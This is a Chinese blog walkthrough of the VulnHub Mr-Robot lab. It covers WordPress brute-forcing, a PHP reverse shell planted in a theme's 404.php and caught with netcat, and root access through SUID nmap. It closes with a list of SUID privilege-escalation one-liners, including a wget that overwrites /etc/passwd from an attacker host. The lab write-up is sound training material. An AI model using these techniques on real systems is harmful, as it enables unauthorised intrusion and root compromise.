[Vulnhub] MR-ROBOT Linux SUID提权

最新推荐文章于 2022-09-24 22:12:53 发布
最新推荐文章于 2022-09-24 22:12:53 发布
阅读量245 收藏
点赞数
分类专栏: 靶场笔记 文章标签: linux 渗透测试 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/116938725
版权

0x00 环境搭建

靶机地址:https://www.vulnhub.com/entry/mr-robot-1,151/
下载之后用vmware打开即可,这里使用的是桥接模式。
开机后搭建完成:
在这里插入图片描述

0x01 主机端口探测

arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现关闭了 22端口(SSH服务)、但开放了80端口(HTTP服务)、443端口(HTTPS服务)

0x02 web渗透

访问80端口,发现提供了几条命令,依次尝试一下:
在这里插入图片描述
输入prepare命令是播放一段视频;
输入fsociety命令也是一段视频;
输入inform命令是一些图片;
输入question命令也是一些图片;
输入join命令弹出提示输入邮箱地址;
其他命令无效果。

接下来进行目录扫描,输入命令dirb http:
在这里插入图片描述
在这里插入图片描述

发现了可能有用的目录:/readme、/robots.txt、/wp-login等
访问/robots.txt,发现一个flag文件和一个字典文件:
在这里插入图片描述
访问/key-1-of-3.txt获得第一个flag:
在这里插入图片描述
访问/fsocity.dic获得字典文件:
在这里插入图片描述
字典大小有6.9MB,用字典去重工具进行去重,得到的文件有105k
在这里插入图片描述

访问wp-login,发现是WordPress登录页面
尝试弱口令,发现用户名不正确,说明用户可暴破,用刚才的字典进行暴破:
在这里插入图片描述
暴破得到用户名为Elliot
在这里插入图片描述
接下来暴破Elliot账户的密码,得到密码为ER28-0652,方法同上,不再演示。

利用暴破出的账号密码,成功登入后台:
在这里插入图片描述

0x03 getshell

进入后台,在404页面插马拿shell:
在这里插入图片描述
这里使用kali自带的php反弹shell,输入命令find / -name php-reverse-shell.php尝试寻找可以利用的php反弹shell文件:
在这里插入图片描述

将查找到的文件替换掉404.php文件,并将ip地址改为攻击机地址和端口,点击更新档案上传文件:
在这里插入图片描述

在攻击机上输入命令 nc-lvp 12581监听12581端口:
在这里插入图片描述

访问修改后的404.php(随便构造一个不存在的页面触发shell)文件,得到反弹shell:
在这里插入图片描述
查看自己的用户和权限,可以发现权限不高:
在这里插入图片描述
使用cat /etc/passwd 查看靶机中的用户,发现有robot用户:
在这里插入图片描述
查看/home/robot文件夹中发现有两个文件:
在这里插入图片描述
查看key-2-of-3.txt发现权限不足,于是查看password.raw-md5文件。
在这里插入图片描述
解密后得到密码:abcdefghijklmnopqrstuvwxyz,尝试切换robot用户:
使用python -c 'import pty;pty.spawn("/bin/bash")'命令打开终端,用su robot命令切换用户输入密码:
在这里插入图片描述
获取第二个flag:
在这里插入图片描述

0x04 Linux SUID提权

SUID概念

功用:用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。
作用:只作用于二进制文件中。

SUID提权原理

设置了SUID的文件可以让调用者在调用该文件时以文件拥有者的身份运行该文件,所以利用SUID提权的原理就是运行拥有者为root并设置了SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了,如果此时可以输入命令,就可以打开一个用户身份为root的shell。

已知可用来提权的linux文件
  1. nmap
  2. vim/vi
  3. find
  4. bash
  5. more
  6. less
  7. nano
  8. cp
提权过程

使用find / -perm -u=s -type f 2>/dev/null查找设置了SUID的文件:
在这里插入图片描述
发现nmap有SUID标志位,查看nmap版本(早期版本的Nmap(2.02到5.21)有交互模式,nmap支持"interactive"选项,允许用户执行shell命令,通常,安全人员会使用改命令来避免他们使用namp命令被记录在history文件中):
在这里插入图片描述
使用nmap --interactive,进入交互模式,接着使用命令:!sh成功提权为root用户:
在这里插入图片描述
切换root目录下,拿到第三个flag:
在这里插入图片描述
整体流程如下:
靶机 => 主机端口探测 => web渗透(第一个flag) => 暴破账户密码 => 404.php写入木马 => 反弹shell => 查看密码文件 => 切换用户(第二个flag ) => SUID提权(第三个flag)

补充SUID提权
  1. namp版本:老版的nmap(2.02-5.21)有相互的功能–interactive
nmap --interactive
!sh

msf中也有相关模块exploit/unix/local/setuid_nmap

  1. vim/vi版本:如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件
vim/vi
:!/bin/bash 或 :shell
  1. find版本:如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。
touch test
find test -exec whoami \;
  1. bash版本:
bash -p
  1. less/more版本:
less /etc/passwd
!/bin/sh
  1. nano版本:执行nano /etc/passwd , 即可添加root用户
  2. cp/mv版本:使用cp命令覆盖原本的/etc/passwd文件
  3. wget版本:
wget http://[your-ip]/passwd -O /etc/passwd
  1. teehee版本:将john写入root用户组里
echo "john::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

参考链接:
https://www.cnblogs.com/jesse-cavendish/p/13203523.html(VulnHub实战靶场Mr-Robot)
https://blog.csdn.net/qq_41123867/article/details/104924160(Linux中suid提权)
https://blog.csdn.net/qq_39293438/article/details/104094194(Linux SUID 提权)

yAnd0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub--mrrobot
记录笔记
07-06 833
Vulnhub靶场--Mr robot 靶机
MR-ROBOT-TELEVISION
04-14
#EXTM3U #EXTINF:-1 group-title =“ Generalistas” tvg-logo =“ 1 #EXTINF:-1 group-title =“ Generalistas” tvg-logo =“ 1 #EXTINF:-1 group-title =“ Generalistas” tvg-logo =“ 2 #EXTINF:-1 group...
vulnhub靶场,MR-ROBOT: 1
kukudeshuo的博客
12-16 782
vulnhub靶场,MR-ROBOT: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 攻击机:kali(192.168.109.128) 靶机:MR-ROBOT: 1(192.168.109.190) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:需要获取目标靶机的三个flag 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开
Vulnhub靶场渗透-mrRobot
paidx0
09-21 948
前言 靶机ip(192.168.110.133) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 漏洞挖掘 扫到的东西比较多,逐个看了一下,在robots.txt里找到第一个 flag,还发现一个字典 其次还找到 Wordpress的登录页 flag1 : 073403c8a58a1f80d943455fb30724b9 可以看看robots.txt里的字典内容,拿这个字典去爆破WordPress登录页 因为需要的时间比较长,就不再跑一边截图了,账号 elli
靶场练习第七天~vulnhub靶场之mrRobot
qq_57976347的博客
02-01 1528
靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。 2.使用dirb命令扫描靶机网站 用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.16
Mrrobot靶机渗透实战-vuluhub系列(六)
PANDA墨森的博客
07-04 590
这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshellsuid提权-nmap命令,话不多说,直接开始吧... 靶机下载地址: https://www.vulnhub.com/entry/mr-robot-1,151/ #001 实验环境(nat模式) 攻击机:kali:192.168.136.129 靶机mrrobot:192.168.136.138 #002 实战writeup 寻找靶机ip,查找网卡中存活的主机,找到靶机ip:19...
Linux-RobotFramework.zip
07-20
**Linux上的Robot Framework安装与应用指南** Robot Framework是一款开源的自动化测试框架,广泛应用于系统测试、验收测试、回归测试等领域。它支持关键字驱动测试方法,允许用户使用自定义的关键词来编写测试用例...
Servo-Robot.docx
06-30
Servo-Robot全文共3页,当前为第1页。Servo-Robot全文共3页,当前为第1页。Servo robot 激光跟踪传感器是目前世界上最先进的跟踪传感器,可实现6-D跟踪,与kuka机器人有良好的接口。其详细性如下: Servo-Robot全文...
mr-robot183.github.io:简单的简历网页
04-11
考虑到这个压缩包包含的是"mr-robot183.github.io-master"目录,很可能用户使用了Git进行版本控制,并通过GitHub Actions或者Jekyll等工具自动构建和部署网页。这些工具可以将源代码转换为符合GitHub Pages要求的...
6-DOF-robot-urdf文件
07-03
在"6-DOF-robot-urdf"文件中,我们主要会看到以下几个关键元素: 1. **链接(Links)**:每个链接代表机器人上的一个物理实体,例如机械臂的一个段或者末端执行器。链接描述了其几何形状、质量属性(如质量、质心...
[Vulnhub] mrRobot
weixin_63231007的博客
07-04 328
目录信息搜集wordpress拿shell SUID提权 下载链接:Mr-Robot: 1 ~ VulnHub nmap 192.168.236.0/24扫除靶机ip :192.168.236.135nmap -A 192.168.236.135 开放了22,80,443.但是22端口close 了ssh服务 dirb扫描一下看看,有没有隐藏目录文件或登录入口看见了/login/ 访问之后发现变成了wp-login.php 可以知道这里是wordpress后台管理地址还有 robots.txt 在robo
Linux Ubuntu 默认root密码
07-30 177
Ubuntu 默认root密码是随机的,每次开机都会有一个新的root密码 第一步: 输入命令:sudo passwd 转载于:https://www.cnblogs.com/ldl326308/p/11268784.html
HA: Wordy靶机-Walkthrough
ins1ght的博客
10-04 1361
这个靶机可利用的漏洞挺多的,像LFI、RFI、文件上传、SQLi,我试着把这几个漏洞都复现了一遍,尽管并不是所有的漏洞都能getshell。最后提权的时候使用了SUID权限的wget,对,你没看错,是wget。除了vim、less、more、nano、cp、mv、find、bash以及nmap,现在又多了一个wget,意不意外,惊不惊喜?
vulnhub靶机-mrRobot
臭nana的博客
05-19 1623
下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 描述: Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn't too difficult. There is
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5141
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
【甄选靶场】Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权
人间体佐菲的博客
09-24 859
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全,网络安全,渗透测试
Linuxsuid提权
qq_41123867的博客
03-18 2181
一、原理: 设置了SUID的文件可以让调用者以文件属主的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了 SUID详解 二、已知可用来提权linux文件: nmap vim find bash more less nano cp 三、提权过程 1. 查看当前用户权限 在获得一个shell后,我们可以...
Pikachu靶场通关笔记
热门推荐
weixin_45605352的博客
03-27 1万+
一. Burte Force(暴力破解) “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的
DVWA靶场通关笔记
weixin_45605352的博客
03-17 2630
文章目录Brute Force 暴力破解LowMediumHighImpossible防护总结:Command Injection 命令注入危害:LowMediumHighImpossible防护总结:CSRF 跨站请求伪造危害:LowMediumHighImpossible防护总结:File Inclusion 文件包含危害:LowMediumHighimpossible防护总结:File Upload 文件上传危害:LowMediumHighImpossible补充常见解析漏洞:防护总结:Insecur
wukong-robot 安装教程
最新发布
01-14
wukong-robot的安装教程如下: 1. 首先,确保你的系统已经安装了Python 3.5或更高版本。你可以在终端中输入以下命令来检查Python版本: ```shell python3 --version ``` 2. 安装wukong-robot的依赖库。在终端中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值